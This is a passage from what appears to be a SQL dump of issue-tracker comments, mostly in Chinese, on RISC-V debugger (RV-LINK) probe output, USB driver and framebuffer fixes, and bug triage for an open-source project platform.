dtmcs.idle: 6 dmstatus: 0x00430ca2 dmstatus.version: 2\ndmstatus.confstrptrvalid: 0 dmstatus.hasresethaltreq: 1 dmstatus.authenticated:\n1 dmstatus.impebreak: 1 dmcontrol:\n0x00000001 dmcontrol.dmactive: 1 halt hart... dmstatus: 0x004303a2\ndmstatus.anyhalted: 1 dmstatus.allhalted: 1 \nhartinfo: 0x002140c0 hartinfo.dataaddr: 192 hartinfo.datasize: 4\nhartinfo.dataaccess: 1, memory map\n</p>\n<p align=\"left\" style=\"text-align:left;\">\n hartinfo.nscratch: 2 \nabstractcs: 0x02000004 abstractcs.datacount : 4 abstractcs.progbufsize :\n2 abstractauto: 0x0003000f\nabstractauto.autoexecdata : 0x00f abstractauto.autoexecprogbuf : 0x0003 sbcs: 0x00000000 sbcs.sbaccess8 : 0\nsbcs.sbaccess16 : 0 sbcs.sbaccess32 : 0 sbcs.sbaccess64 : 0 sbcs.sbaccess128 :\n0 sbcs.sbasize : 0 bits\n</p>\n<p align=\"left\" style=\"text-align:left;\">\n sbcs.sbversion : 0 read x1 x1: 0x0800155c read misa misa:\n0x40901105 read dpc dpc: 0x08002248 resume hart... dmstatus: 0x00430ca2\ndmstatus.anyhalted: 0 dmstatus.allhalted: 0 quick access\n</p>\n<p align=\"left\" style=\"text-align:left;\">\n quick access 0 dpc: 0x08002998 quick access 1 dpc:\n0x08002a64 quick access 2 dpc: 0x080022e4 quick access 3 dpc: 0x080029a4 quick\naccess 4 dpc: 0x08001a2c quick access 5 dpc: 0x080026b4 access memory\n</p>\nhalt hart... dmstatus: 0x004003a2 dmstatus.anyhalted:\n1 dmstatus.allhalted: 1 access memory 0x08000000: 0x15c0006f probe triggers\ntselect_max: 3 tselect: 0, tinfo: 0x0000003c tselect: 1, tinfo: 0x0000003c\ntselect: 2, tinfo: 0x0000003c tselect: 3, tinfo: 0x0000003c resume hart...\ndmstatus: 0x00430ca2 dmstatus.anyhalted: 0 dmstatus.allhalted: 0','2019-11-07 16:07:14',0,NULL,0,NULL),(82,74,'Issue',46,'<p style=\"margin-left:21.0pt;text-indent:-21.0pt;\">\n 1) 以普通用户登录,角色为项目组报告员。发现唐艺所提问题,进行回复<span>:</span>是否是因为系统配置中目录设置问题导致。<span></span>\n</p>','2019-11-07 16:21:55',0,NULL,0,NULL),(83,74,'Issue',71,'问问','2019-11-08 09:11:56',0,NULL,0,NULL),(84,75,'Issue',50,'','2019-11-08 11:08:18',0,NULL,0,NULL),(85,76,'Issue',49,'<span style=\"background-color:#FFFFFF;color:rgba(0, 0, 0, 0.8);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Liberation Sans","PingFang SC","Microsoft YaHei","Hiragino Sans GB","Wenquanyi Micro Hei","WenQuanYi Zen Hei","ST Heiti",SimHei,SimSun,"WenQuanYi Zen Hei Sharp",sans-serif;font-size:14px;font-style:normal;font-weight:400;line-height:1.6;text-decoration:none;\">将 Windows 10 的 usbser.inf 文件拷贝到 Windows 7,注释掉 </span>SourceDisksNames<span style=\"background-color:#FFFFFF;color:rgba(0, 0, 0, 0.8);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Liberation Sans","PingFang SC","Microsoft YaHei","Hiragino Sans GB","Wenquanyi Micro Hei","WenQuanYi Zen Hei","ST Heiti",SimHei,SimSun,"WenQuanYi Zen Hei Sharp",sans-serif;font-size:14px;font-style:normal;font-weight:400;line-height:1.6;text-decoration:none;\"> 和 </span>SourceDisksFiles<span style=\"background-color:#FFFFFF;color:rgba(0, 0, 0, 0.8);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Liberation Sans","PingFang SC","Microsoft YaHei","Hiragino Sans GB","Wenquanyi Micro Hei","WenQuanYi Zen Hei","ST Heiti",SimHei,SimSun,"WenQuanYi Zen Hei Sharp",sans-serif;font-size:14px;font-style:normal;font-weight:400;line-height:1.6;text-decoration:none;\"> 部分,这是一个类设备驱动配置文件,所有 CDC 类设备都可以使用这个配置文件来安装驱动,不管是哪家的设备,换上这个配置文件来安装驱动就不会蓝屏了。</span>','2019-11-08 11:13:50',0,NULL,0,NULL),(86,87,'Issue',49,'<span style=\"background-color:#FFFFFF;color:rgba(0, 0, 0, 0.8);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Liberation Sans","PingFang SC","Microsoft YaHei","Hiragino Sans GB","Wenquanyi Micro Hei","WenQuanYi Zen Hei","ST Heiti",SimHei,SimSun,"WenQuanYi Zen Hei Sharp",sans-serif;font-size:14px;font-style:normal;font-weight:400;line-height:1.6;text-decoration:none;\">循环变量被覆盖,嵌套的两层 protothread 均使用 i 作为循环变量,下层覆盖了上层的循环变量。</span>','2019-11-08 11:20:01',0,NULL,0,NULL),(87,89,'Issue',49,'<span style=\"background-color:#FFFFFF;color:rgba(0, 0, 0, 0.8);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Liberation Sans","PingFang SC","Microsoft YaHei","Hiragino Sans GB","Wenquanyi Micro Hei","WenQuanYi Zen Hei","ST Heiti",SimHei,SimSun,"WenQuanYi Zen Hei Sharp",sans-serif;font-size:14px;font-style:normal;font-weight:400;line-height:1.6;text-decoration:none;\">问题已解决,是 rvl_target_write_memory 出了问题,rvl_target_write_memory 的问题是引用了错误的 pt ,见: </span><a href=\"https://gitee.com/zoomdy/RV-LINK/commit/5439574024109ebef0c85df22af2e381a1dd34de\" target=\"_blank\" rel=\"nofollow noreferrer noopener\"></a><a href=\"https://gitee.com/zoomdy/RV-LINK/commit/5439574024109ebef0c85df22af2e381a1dd34de\">5439574</a>','2019-11-08 11:23:03',0,NULL,0,NULL),(88,91,'Issue',65,'<ul style=\"color:rgba(0, 0, 0, 0.8);font-family:-apple-system,BlinkMacSystemFont,&font-size:14px;font-style:normal;font-weight:400;text-align:left;text-decoration:none;text-indent:0px;\">\n <li>\n 要求 srst 输出低电平时,srst 配置成 OD 输出 0;\n </li>\n <li>\n 其它情况下,srst 配置成 Analog input,由 target 电路决定 reset 引脚状态,一般来讲 target reset 引脚会有上拉电阻,srst 随后变成高电平,如果 target 有复位按钮,那么 RV-LINK 的 srst 输出配置成 Analog input 不会影响复位按钮对 target reset 引脚的控制。\n </li>\n</ul>','2019-11-08 11:27:49',0,NULL,0,NULL),(89,92,'Issue',65,'<span style=\"background-color:#FFFFFF;color:rgba(0, 0, 0, 0.8);font-family:-apple-system,BlinkMacSystemFont,"font-size:14px;font-style:normal;font-weight:400;line-height:1.6;text-decoration:none;\">gdlink慢的关键是其USB使用的是HID,HID设备用的是Interrupt传输,每毫秒最多收或发一个包。</span>','2019-11-08 11:29:30',0,NULL,0,NULL),(90,92,'Issue',63,'<span style=\"background-color:#FFFFFF;color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "line-height:1.6;\">HID慢是在主机端,如果主机端使用bulk的API,而不是libhid或者hidapi,一样可以加速的。</span><br />\n<span style=\"background-color:#FFFFFF;color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "line-height:1.6;\"> JTAG加速的话,一般就是用SPI</span>','2019-11-08 11:29:59',0,NULL,0,NULL),(91,92,'Issue',65,'<a href=\"http://bbs.21ic.com/icview-2865064-1-1.html\" target=\"_blank\" rel=\"nofollow noreferrer noopener\">http://bbs.21ic.com/icview-2865064-1-1.html</a><br />\n<span style=\"background-color:#FFFFFF;color:rgba(0, 0, 0, 0.8);font-family:-apple-system,BlinkMacSystemFont,"font-size:14px;font-style:normal;font-weight:400;line-height:1.6;text-decoration:none;\"> 今天测试了一下高速JTAG,18M下都OK</span>','2019-11-08 11:30:46',0,NULL,0,NULL),(92,92,'Issue',46,'<span style=\"background-color:#FFFFFF;color:rgba(0, 0, 0, 0.8);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Liberation Sans","PingFang SC","Microsoft YaHei","Hiragino Sans GB","Wenquanyi Micro Hei","WenQuanYi Zen Hei","ST Heiti",SimHei,SimSun,"WenQuanYi Zen Hei Sharp",sans-serif;font-size:14px;font-style:normal;font-weight:400;line-height:1.6;text-decoration:none;\">我也是搜索gdlink速度慢的问题,正好看到这个。</span><br />\n<span style=\"background-color:#FFFFFF;color:rgba(0, 0, 0, 0.8);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Liberation Sans","PingFang SC","Microsoft YaHei","Hiragino Sans GB","Wenquanyi Micro Hei","WenQuanYi Zen Hei","ST Heiti",SimHei,SimSun,"WenQuanYi Zen Hei Sharp",sans-serif;font-size:14px;font-style:normal;font-weight:400;line-height:1.6;text-decoration:none;\"> 我以前也考虑过这么做,很多的代码都弄好了,只是后来也不玩调试器了</span><br />\n<span style=\"background-color:#FFFFFF;color:rgba(0, 0, 0, 0.8);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Liberation Sans","PingFang SC","Microsoft YaHei","Hiragino Sans GB","Wenquanyi Micro Hei","WenQuanYi Zen Hei","ST Heiti",SimHei,SimSun,"WenQuanYi Zen Hei Sharp",sans-serif;font-size:14px;font-style:normal;font-weight:400;line-height:1.6;text-decoration:none;\"> 后面我也可能把这个重新拿出来玩玩,如果有空的话</span>','2019-11-08 11:31:14',0,NULL,0,NULL),(93,75,'Issue',50,'','2019-11-08 11:42:04',0,NULL,0,NULL),(94,85,'Issue',50,'','2019-11-08 11:43:04',0,NULL,0,NULL),(95,75,'Issue',50,'','2019-11-08 11:43:35',0,NULL,0,NULL),(96,75,'Issue',50,'','2019-11-08 11:44:16',0,NULL,0,NULL),(97,73,'Issue',50,'','2019-11-08 14:35:38',0,NULL,0,NULL),(98,73,'Issue',50,'','2019-11-08 14:36:00',0,NULL,0,NULL),(99,74,'Issue',50,'','2019-11-08 14:36:34',0,NULL,0,NULL),(100,76,'Issue',50,'','2019-11-08 14:37:02',0,NULL,0,NULL),(101,77,'Issue',50,'','2019-11-08 14:37:25',0,NULL,0,NULL),(102,78,'Issue',50,'','2019-11-08 14:37:46',0,NULL,0,NULL),(103,79,'Issue',50,'','2019-11-08 14:38:08',0,NULL,0,NULL),(104,80,'Issue',50,'','2019-11-08 14:38:27',0,NULL,0,NULL),(105,81,'Issue',50,'','2019-11-08 14:40:39',0,NULL,0,NULL),(106,82,'Issue',50,'','2019-11-08 14:41:09',0,NULL,0,NULL),(107,83,'Issue',50,'','2019-11-08 14:44:36',0,NULL,0,NULL),(108,84,'Issue',50,'','2019-11-08 14:44:48',0,NULL,0,NULL),(109,86,'Issue',50,'','2019-11-08 14:44:57',0,NULL,0,NULL),(110,87,'Issue',50,'','2019-11-08 14:49:14',0,NULL,0,NULL),(111,88,'Issue',50,'','2019-11-08 14:49:24',0,NULL,0,NULL),(112,89,'Issue',50,'','2019-11-08 14:49:33',0,NULL,0,NULL),(113,91,'Issue',50,'','2019-11-08 14:49:43',0,NULL,0,NULL),(114,92,'Issue',50,'','2019-11-08 14:49:53',0,NULL,0,NULL),(115,84,'Issue',50,'','2019-11-08 14:50:38',0,NULL,0,NULL),(116,86,'Issue',50,'','2019-11-08 14:50:47',0,NULL,0,NULL),(117,88,'Issue',50,'','2019-11-08 14:51:32',0,NULL,0,NULL),(118,87,'Issue',50,'','2019-11-08 14:51:42',0,NULL,0,NULL),(119,94,'Issue',66,'<span style=\"color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "font-size:14px;font-style:normal;font-weight:400;background-color:#FFFFFF;\">问题已经解决:</span><br />\n<span style=\"color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "font-size:14px;font-style:normal;font-weight:400;background-color:#FFFFFF;\">vinfo.red = s_r32;</span><br />\n<span style=\"color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "font-size:14px;font-style:normal;font-weight:400;background-color:#FFFFFF;\">vinfo.green = s_g32;</span><br />\n<span style=\"color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "font-size:14px;font-style:normal;font-weight:400;background-color:#FFFFFF;\">vinfo.blue = s_b32;</span><br />\n<span style=\"color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "font-size:14px;font-style:normal;font-weight:400;background-color:#FFFFFF;\">vinfo.transp = s_a32;</span><br />\n<span style=\"color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "font-size:14px;font-style:normal;font-weight:400;background-color:#FFFFFF;\">vinfo.bits_per_pixel = 32;</span><br />\n<span style=\"color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "font-size:14px;font-style:normal;font-weight:400;background-color:#FFFFFF;\">vinfo.xres=720;</span><br />\n<span style=\"color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "font-size:14px;font-style:normal;font-weight:400;background-color:#FFFFFF;\">vinfo.yres=576;</span><br />\n<span style=\"color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "font-size:14px;font-style:normal;font-weight:400;background-color:#FFFFFF;\">vinfo.activate=FB_ACTIVATE_NOW;</span><br />\n<span style=\"color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "font-size:14px;font-style:normal;font-weight:400;background-color:#FFFFFF;\">vinfo.xres_virtual=720;</span><br />\n<span style=\"color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "font-size:14px;font-style:normal;font-weight:400;background-color:#FFFFFF;\">vinfo.yres_virtual = 576;</span><br />\n<span style=\"color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "font-size:14px;font-style:normal;font-weight:400;background-color:#FFFFFF;\">vinfo.xoffset=0;</span><br />\n<span style=\"color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "font-size:14px;font-style:normal;font-weight:400;background-color:#FFFFFF;\">vinfo.yoffset=0;</span><br />\n<span style=\"color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "font-size:14px;font-style:normal;font-weight:400;background-color:#FFFFFF;\">if (0 > ioctl(fd, FBIOPUT_VSCREENINFO, &vinfo))</span><br />\n<span style=\"color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "font-size:14px;font-style:normal;font-weight:400;background-color:#FFFFFF;\">{</span><br />\n<span style=\"color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "font-size:14px;font-style:normal;font-weight:400;background-color:#FFFFFF;\">printf(\"get fb info failed!\\n\");</span><br />\n<span style=\"color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "font-size:14px;font-style:normal;font-weight:400;background-color:#FFFFFF;\">_exit(-1);</span><br />\n<span style=\"color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "font-size:14px;font-style:normal;font-weight:400;background-color:#FFFFFF;\">}</span><br />\n<span style=\"color:rgba(0, 0, 0, 0.8);font-family:-apple-system, BlinkMacSystemFont, "font-size:14px;font-style:normal;font-weight:400;background-color:#FFFFFF;\">将framebufer的bits_per_pixel 改为32位解决</span>','2019-11-10 12:45:03',0,NULL,0,NULL),(120,96,'Issue',49,'','2019-11-11 08:12:56',0,NULL,0,NULL),(121,95,'Issue',49,'','2019-11-11 08:13:10',0,NULL,0,NULL),(122,94,'Issue',49,'','2019-11-11 08:13:21',0,NULL,0,NULL),(123,93,'Issue',49,'','2019-11-11 08:13:41',0,NULL,0,NULL),(124,97,'Issue',49,'<p>\n haode \n</p>\n<p>\n <br />\n</p>','2019-11-11 10:00:12',0,NULL,0,NULL),(125,101,'Issue',49,'','2019-11-11 12:34:34',0,NULL,0,NULL),(126,100,'Issue',49,'','2019-11-11 14:26:35',0,NULL,0,NULL),(127,99,'Issue',49,'','2019-11-11 14:26:45',0,NULL,0,NULL),(128,98,'Issue',49,'','2019-11-11 14:26:53',0,NULL,0,NULL),(129,102,'Issue',49,'<p class=\"MsoListParagraph\" style=\"margin-left:21.0pt;text-indent:-21.0pt;\">\n 1) GD32VF103 已经支持<span> abstractauto</span>\n</p>\n<p class=\"MsoListParagraph\" style=\"margin-left:21.0pt;text-indent:-21.0pt;\">\n 2) GD32VF103 的<span> prober </span>输出: <span></span>\n</p>\n<p class=\"MsoNormal\" align=\"left\" style=\"text-align:left;\">\n finding\nTAPs..................................................\n</p>\n<p class=\"MsoNormal\" align=\"left\" style=\"text-align:left;\">\n found 2 TAP(s)\n</p>\n<p class=\"MsoNormal\" align=\"left\" style=\"text-align:left;\">\n TAP0 ir len: 5\nTAP1 ir len: 5 TAP0 config ==================================================\n</p>\n<p class=\"MsoNormal\" align=\"left\" style=\"text-align:left;\">\n ir pre: 0,\nir_post: 5 dr_pre: 0, dr_post: 1 idcode: 0x1000563d idcode.version: 1\nidcode.part_number: 0x5 idcode.manuf_id: 0x31e \ndtmcs: 0x00007071 dtmcs.version: 1 dtmcs.abits: 7 dtmcs.idle: 6 dmstatus: 0x00430ca2 dmstatus.version: 2\ndmstatus.confstrptrvalid: 0 dmstatus.hasresethaltreq: 1 dmstatus.authenticated:\n1 dmstatus.impebreak: 1 dmcontrol:\n0x00000001 dmcontrol.dmactive: 1 halt hart... dmstatus: 0x004303a2\ndmstatus.anyhalted: 1 dmstatus.allhalted: 1 \nhartinfo: 0x002140c0 hartinfo.dataaddr: 192 hartinfo.datasize: 4\nhartinfo.dataaccess: 1, memory map\n</p>\n<p class=\"MsoNormal\" align=\"left\" style=\"text-align:left;\">\n hartinfo.nscratch: 2 \nabstractcs: 0x02000004 abstractcs.datacount : 4 abstractcs.progbufsize :\n2 abstractauto: 0x0003000f\nabstractauto.autoexecdata : 0x00f abstractauto.autoexecprogbuf : 0x0003 sbcs: 0x00000000 sbcs.sbaccess8 : 0\nsbcs.sbaccess16 : 0 sbcs.sbaccess32 : 0 sbcs.sbaccess64 : 0 sbcs.sbaccess128 :\n0 sbcs.sbasize : 0 bits\n</p>\n<p class=\"MsoNormal\" align=\"left\" style=\"text-align:left;\">\n sbcs.sbversion : 0 read x1 x1: 0x0800155c read misa misa:\n0x40901105 read dpc dpc: 0x08002248 resume hart... dmstatus: 0x00430ca2\ndmstatus.anyhalted: 0 dmstatus.allhalted: 0 quick access\n</p>\n<p class=\"MsoNormal\" align=\"left\" style=\"text-align:left;\">\n quick access 0 dpc: 0x08002998 quick access 1 dpc:\n0x08002a64 quick access 2 dpc: 0x080022e4 quick access 3 dpc: 0x080029a4 quick\naccess 4 dpc: 0x08001a2c quick access 5 dpc: 0x080026b4 access memory\n</p>\n<p class=\"MsoNormal\" align=\"left\" style=\"text-align:left;\">\n halt hart... dmstatus: 0x004003a2 dmstatus.anyhalted: 1\ndmstatus.allhalted: 1 access memory 0x08000000: 0x15c0006f probe triggers\ntselect_max: 3 tselect: 0, tinfo: 0x0000003c tselect: 1, tinfo: 0x0000003c\ntselect: 2, tinfo: 0x0000003c tselect: 3, tinfo: 0x0000003c resume hart...\ndmstatus: 0x00430ca2 dmstatus.anyhalted: 0 dmstatus.allhalted: 0\n</p>','2019-11-11 17:13:34',0,NULL,0,NULL),(131,100,'Issue',46,'注意做好版本控制<br />','2019-11-22 09:24:00',0,NULL,0,NULL),(132,99,'Issue',46,'','2019-11-22 09:44:13',0,NULL,0,NULL),(133,101,'Issue',46,'','2019-11-22 09:52:22',0,NULL,0,NULL),(134,101,'Issue',46,'','2019-11-22 09:56:37',0,NULL,0,NULL),(135,100,'Issue',46,'','2019-11-22 10:01:49',0,NULL,0,NULL),(137,122,'Issue',81,'','2020-02-11 10:20:29',0,NULL,0,NULL),(138,112,'Issue',81,'','2020-02-11 10:28:40',0,NULL,0,NULL),(139,126,'Issue',86,'收到','2020-02-11 10:42:16',0,NULL,0,NULL),(140,112,'Issue',89,'<p>\n 收到\n</p>','2020-02-11 11:29:44',0,NULL,0,NULL),(141,125,'Issue',89,'收到','2020-02-11 11:31:22',0,NULL,0,NULL),(142,114,'Issue',77,'Test comment.','2020-02-11 11:33:33',0,NULL,0,NULL),(143,135,'Issue',99,'','2020-02-11 17:03:23',0,NULL,0,NULL),(144,114,'Issue',98,'copy','2020-02-11 21:01:22',0,NULL,0,NULL),(146,134,'Issue',99,'','2020-02-13 08:25:36',0,NULL,0,NULL),(147,133,'Issue',99,'','2020-02-13 08:26:15',0,NULL,0,NULL),(148,132,'Issue',99,'','2020-02-13 08:26:49',0,NULL,0,NULL),(149,129,'Issue',80,'','2020-02-24 18:32:32',0,NULL,0,NULL),(150,115,'Issue',80,'','2020-03-19 14:13:32',0,NULL,0,NULL),(151,143,'Issue',1,NULL,'2020-08-13 01:59:21',0,NULL,0,NULL),(152,143,'Issue',1,NULL,'2020-08-13 01:59:57',0,NULL,0,NULL),(153,148,'Issue',1,NULL,'2020-08-13 02:09:16',0,NULL,0,NULL),(154,146,'Issue',47,NULL,'2020-08-13 05:51:19',0,NULL,0,NULL),(155,145,'Issue',47,'哪个项目没有的啊?\n现在开源首页显示出来的项目,在后台管理页面中,应该是都有的。\n\n但是后台管理页面中的项目,开源首页不一定全部显示。\n\n开源首页显示出来的项目全部为公开项目,不显示私有项目','2020-08-13 06:04:17',0,NULL,0,NULL),(156,147,'Issue',1,NULL,'2020-08-13 06:52:18',0,NULL,0,NULL),(157,148,'Issue',1,NULL,'2020-08-13 06:52:29',0,NULL,0,NULL),(158,151,'Issue',1,NULL,'2020-08-13 06:52:56',0,NULL,0,NULL),(159,152,'Issue',1,NULL,'2020-08-13 07:14:14',0,NULL,0,NULL),(160,153,'Issue',1,NULL,'2020-08-13 07:28:08',0,NULL,0,NULL),(161,159,'Issue',46,NULL,'2020-08-14 00:34:27',0,NULL,0,NULL),(162,142,'Issue',46,NULL,'2020-08-14 00:55:56',0,NULL,0,NULL),(163,162,'Issue',46,NULL,'2020-08-14 01:31:41',0,NULL,0,NULL),(164,163,'Issue',46,NULL,'2020-08-14 01:38:45',0,NULL,0,NULL),(165,165,'Issue',46,NULL,'2020-08-14 02:31:02',0,NULL,0,NULL),(166,163,'Issue',46,NULL,'2020-08-14 08:11:48',0,NULL,0,NULL),(167,169,'Issue',1,NULL,'2020-08-17 01:37:11',0,NULL,0,NULL),(168,150,'Issue',1,NULL,'2020-08-17 01:38:05',0,NULL,0,NULL),(169,169,'Issue',1,NULL,'2020-08-17 01:52:32',0,NULL,0,NULL),(170,169,'Issue',1,NULL,'2020-08-17 01:53:02',0,NULL,0,NULL),(171,169,'Issue',1,NULL,'2020-08-17 01:53:59',0,NULL,0,NULL),(172,171,'Issue',1,NULL,'2020-08-17 08:22:04',0,NULL,0,NULL),(173,175,'Issue',47,'登录是哪个账户?在军科登录的账户需要在开源项目也存在该用户,且login一致,才能登录的','2020-08-17 10:23:27',0,NULL,0,NULL),(174,177,'Issue',47,'ddddd','2020-08-17 10:44:05',0,NULL,0,NULL),(175,180,'Issue',1,NULL,'2020-08-18 01:25:00',0,NULL,0,NULL),(176,180,'Issue',1,NULL,'2020-08-18 01:25:54',0,NULL,0,NULL),(177,180,'Issue',1,NULL,'2020-08-18 01:32:55',0,NULL,0,NULL),(178,180,'Issue',47,NULL,'2020-08-19 01:49:34',0,NULL,0,NULL),(179,180,'Issue',47,'这个不是bug,评论只有通过链接才能进,页面上是看不到的','2020-08-19 01:50:14',0,NULL,0,NULL),(180,175,'Issue',47,NULL,'2020-08-19 01:56:41',0,NULL,0,NULL),(181,143,'Issue',47,NULL,'2020-08-19 01:57:20',0,NULL,0,NULL),(182,169,'Issue',47,NULL,'2020-08-19 01:57:38',0,NULL,0,NULL),(183,178,'Issue',47,NULL,'2020-08-19 02:27:05',0,NULL,0,NULL),(184,174,'Issue',47,NULL,'2020-08-19 10:10:56',0,NULL,0,NULL),(185,179,'Issue',47,NULL,'2020-08-19 10:19:59',0,NULL,0,NULL),(186,173,'Issue',47,NULL,'2020-08-19 10:33:55',0,NULL,0,NULL),(187,172,'Issue',1,NULL,'2020-08-20 00:55:37',0,NULL,0,NULL),(188,172,'Issue',1,NULL,'2020-08-20 00:55:58',0,NULL,0,NULL),(189,189,'Issue',1,NULL,'2020-08-20 01:55:02',0,NULL,0,NULL),(190,144,'Issue',47,NULL,'2020-08-20 02:48:58',0,NULL,0,NULL),(191,149,'Issue',47,'比如说什么功能?请详细描述或截图','2020-08-20 02:49:27',0,NULL,0,NULL),(192,159,'Issue',47,NULL,'2020-08-20 02:56:40',0,NULL,0,NULL),(193,161,'Issue',47,'错误提示是什么?请提供下截图,谢谢','2020-08-20 03:02:27',0,NULL,0,NULL),(194,167,'Issue',47,NULL,'2020-08-20 03:04:32',0,NULL,0,NULL),(195,163,'Issue',47,NULL,'2020-08-20 03:06:08',0,NULL,0,NULL),(196,150,'Issue',47,NULL,'2020-08-20 03:06:33',0,NULL,0,NULL),(197,187,'Issue',47,'已隐藏','2020-08-20 03:09:03',0,NULL,0,NULL),(198,187,'Issue',47,NULL,'2020-08-20 03:09:09',0,NULL,0,NULL),(199,186,'Issue',47,'背景需要统一配置成什么颜色?请具体说明','2020-08-20 03:14:05',0,NULL,0,NULL),(200,188,'Issue',47,NULL,'2020-08-20 03:32:34',0,NULL,0,NULL),(201,162,'Issue',47,NULL,'2020-08-20 03:44:06',0,NULL,0,NULL),(202,160,'Issue',47,NULL,'2020-08-20 03:54:02',0,NULL,0,NULL),(203,184,'Issue',47,'开源项目的个人中心 页面 是否需要指向 论坛的个人页面?','2020-08-20 03:54:55',0,NULL,0,NULL),(204,185,'Issue',47,NULL,'2020-08-20 07:05:14',0,NULL,0,NULL),(205,158,'Issue',47,NULL,'2020-08-20 07:05:37',0,NULL,0,NULL),(206,166,'Issue',47,'这个是项目的分类和军科平台的分类内容不一样导致的,如果是正常的创建项目,不会出现这样的情况','2020-08-20 07:07:07',0,NULL,0,NULL),(207,168,'Issue',47,'我这边测试是可以的,请提供相关竞赛的链接','2020-08-20 07:17:33',0,NULL,0,NULL),(208,187,'Issue',1,'\n消息页面 创客空间 竞赛活动\n还有','2020-08-21 00:26:25',0,NULL,0,NULL),(209,190,'Issue',1,NULL,'2020-08-21 00:31:52',0,NULL,0,NULL),(210,187,'Issue',1,NULL,'2020-08-21 00:34:23',0,NULL,0,NULL),(211,198,'Issue',1,NULL,'2020-08-21 00:46:38',0,NULL,0,NULL),(212,201,'Issue',1,NULL,'2020-08-21 01:11:00',0,NULL,0,NULL),(213,171,'Issue',1,'\n排行榜也有类似问题','2020-08-21 01:13:10',0,NULL,0,NULL),(214,171,'Issue',1,NULL,'2020-08-21 01:13:18',0,NULL,0,NULL),(216,197,'Issue',47,NULL,'2020-08-21 02:36:18',0,NULL,0,NULL),(217,203,'Issue',47,'排行榜的排行榜应该是有的。\n\n初始为空,如果后续添加只能修改,不能删除。','2020-08-21 09:00:39',0,NULL,0,NULL),(218,204,'Issue',47,'1. 帖子是否原创是根据新建/编辑帖子时,选择是否原创来确定的,如下图:\n\n\n\n\n2. 内容里的 “图文:来自网络”,是在编辑内容时自主添加的','2020-08-24 01:29:38',0,NULL,0,NULL),(219,161,'Issue',46,NULL,'2020-08-24 01:41:00',0,NULL,0,NULL),(220,161,'Issue',47,'我这边测试是可以创建文件的。是否账户问题?','2020-08-24 02:01:00',0,NULL,0,NULL),(221,205,'Issue',47,NULL,'2020-08-24 02:11:56',0,NULL,0,NULL),(222,207,'Issue',47,NULL,'2020-08-24 02:12:14',0,NULL,0,NULL),(223,210,'Issue',47,'项目首页的更新时间排序,是根据 项目里的增改是否会修改项目的更新时间。 目前会更新时间的有: \n\n1. 代码的远程提交\n2. 仓库设置里的更新仓库内容\n3. 创建合并请求','2020-08-24 02:32:27',0,NULL,0,NULL),(224,211,'Issue',47,'1. 论坛首页显示的版块是二级版块:\n\n\n\n\n2. 管理员后台的 管理员是一级版块的\n\n','2020-08-24 02:37:44',0,NULL,0,NULL),(225,212,'Issue',47,NULL,'2020-08-24 03:42:07',0,NULL,0,NULL),(226,168,'Issue',46,NULL,'2020-08-24 06:56:46',0,NULL,0,NULL),(227,144,'Issue',46,NULL,'2020-08-24 07:00:31',0,NULL,0,NULL),(228,149,'Issue',46,NULL,'2020-08-24 07:28:05',0,NULL,0,NULL),(229,216,'Issue',46,NULL,'2020-08-24 08:53:22',0,NULL,0,NULL),(230,216,'Issue',46,NULL,'2020-08-24 08:54:32',0,NULL,0,NULL),(231,213,'Issue',46,NULL,'2020-08-25 00:13:07',0,NULL,0,NULL),(232,214,'Issue',47,'登录用户为管理员/帖子发布人时,是可以看到未审核的帖子/回复的','2020-08-25 01:36:49',0,NULL,0,NULL),(233,217,'Issue',47,'这个是正常的。\n1. 铃铛上的通知数量是 私信和消息的总和。\n\n2. 当点击私信后,需刷新页面,上面的铃铛数字会消失','2020-08-25 01:41:04',0,NULL,0,NULL),(234,213,'Issue',47,'排序是根据 置顶 > 精华 > 发布时间 排序的。','2020-08-25 01:46:40',0,NULL,0,NULL),(235,211,'Issue',47,NULL,'2020-08-25 01:52:33',0,NULL,0,NULL),(236,168,'Issue',47,'时间问题引起的,已修复','2020-08-25 